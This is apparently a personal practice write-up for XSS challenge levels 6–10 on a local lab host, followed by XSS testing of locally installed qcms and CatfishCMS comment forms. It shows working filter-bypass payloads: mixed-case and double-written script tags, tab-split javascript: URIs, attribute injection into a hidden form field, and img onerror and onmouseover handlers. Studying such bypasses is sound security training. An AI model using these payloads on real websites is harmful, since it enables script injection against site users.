0x01 xss challenge level 6-10

1.1 level 6

test with typical, notice the script has changed

change script to 'Script', and enclose double quote, bingo
http://n00p.me/xss/level6.php?keyword="><sCript>alert(1)</script> <" &submit

1.2 level 7

test with typical

after these not worked: script to 'Script';
finally, double write script to scrscriptipt, and enclose double quote, bingo:
http://n00p.me/xss/level7.php?keyword="><scrscriptipt>alert(1)</scrscriptipt><"&submit

1.3 level 8

try1, test typical, find two exp-point

try2, enclose the quote
http://n00p.me/xss/level6.php?keyword=<script>alert(1)</script> &submit
as source code , guess htmlspecialchars was used

<input name=keyword  value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;&quot;     ">

try3, move target to next exp-point
http://n00p.me/xss/level8.php?keyword=javascript:alert(1) &submit
http://n00p.me/xss/level8.php?keyword=javaScript:alert(1) &submit
http://n00p.me/xss/level8.php?keyword=javas cript:alert(1) &submit(blank is char-tab, if type this in address bar or hack bar, tab will be chopped. it's concluded by burp suite )
each result:

<a href="javascr_ipt:alert(1)     ">友情链接</a>
<a href="javascr_ipt:alert(1)     ">友情链接</a>
<a href="javascr_ipt:alert(1)     ">友情链接</a>

try4, consider type tab in inputbox ,bingo(intercept by burp, notice char-tab in input box was url-encoded, this differs from address bars, now we can use %09 in address bar to achieve real tab like input-box )

1.4 level 9

try1, use typical as previous, and find this:

<a href="您的链接不合法？有没有！">友情链接</a>

try2, try a valid-like link, works fine
http://n00p.me/xss/level9.php?keyword=http://n00p.me&submit

<a href="http://n00p.me">友情链接</a>

try3, after a few test, http:// is the core string that must include in payload, or it will throw try1, so we just include this string, as level 8, bingo
http://n00p.me/xss/level9.php?keyword=javas%09cript:alert('http://') &submit

1.5 level 10

try1, use typical, and found exp-like in burp's response:

<h2 align=center>没有找到和&lt;script&gt;alert(1)&lt;/script&gt;相关的结果.</h2>

try2, from try1, predefined characters(less than sign< and greater than sign>) has been converted to HTML entities(<>), does it means that we could do nothing about this? Focus the rest html code and notice these:

<form id=search>
<input name="t_link"  value="" type="hidden">
<input name="t_history"  value="" type="hidden">
<input name="t_sort"  value="" type="hidden">
</form>

try3, there is a form including 3 input tags in it. The form method is not defined but default to GET. It means that we can directly build url instead of change html element to detect form exp-points. Build url like this and check is there anything to exploit:
http://n00p.me/xss/level10.php?keyword=aaa&t_link=bbb&t_history=ccc&t_sort=ddd

try4, dada! after we enter the payload above, we found exp-like in response html as below:

<form id="search">
<input name="t_link" value="" type="hidden">
<input name="t_history" value="" type="hidden">
<input name="t_sort" value="ddd" type="hidden">
</form>

try5, enclose the t_sort input, bingo:
http://n00p.me/xss/level10.php?keyword=aaa&t_link=bbb&t_history=ccc&t_sort=d" onclick=alert(1) type="text
why the input use text type instead of hidden type? Explaination see referer link:

What happens in practice is that the latter attribute is ignored

Notice that it is reverse to css selector .
But both duplicate attribute and duplicate css selector are not recommended in production enviroment!

0x02 qcms

2.1 switch php version to 5.2
2.2 bind the site root to 8080 port
2.3 type http://n00p.me:8080 in adress bar, input db-config-info, install, after complete, find 留言 page:

2.4 try typical in textbox, bingo!

0x03 CatfishCMS

3.1 switch php version to 5.5
3.2 open http://n00p.me/catfish, install, register an account, login and click one post, find "留言" as below:

3.3 use typical and submit, notice response that maybe used htmlspecialchars() in php code :

<p><p>&lt;script&gt;alert(1)&lt;/script&gt;</p></p>

3.4 pull out burp and detect exp-point, find this:
pinglun=%3Cp%3E%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B%3C%2Fp%3E
apparently, it has been url encoded, decode it:
pinglun=<p><script>alert(1)</script></p>
the code has been converted before send to server, what about change it to its raw face like below?
pinglun=<p><script>alert(1)</script></p>
forwarded above, comment was succeed to post but nothing was leaved in comment content part. Guess server has filtered script string, use below payload instead, bingo:
pinglun=<p><script>alert(1)</script></p>

3.5 alternative payloads

pinglun=<img src=x onerror=alert(1)>
pinglun=<p onmouseover=alert(12121212)>aa</p>

0x04 summary about cms sites depolyment

reading cms-followed doc is essential, it has valued info to deploy OK
if install-like.page report errors, try change php version
some cms restricts path to www dir, use phpstudy sites_domain_control option can handle this
to deploy a cms site is not difficult, just need some patient and it will work properly

xss part2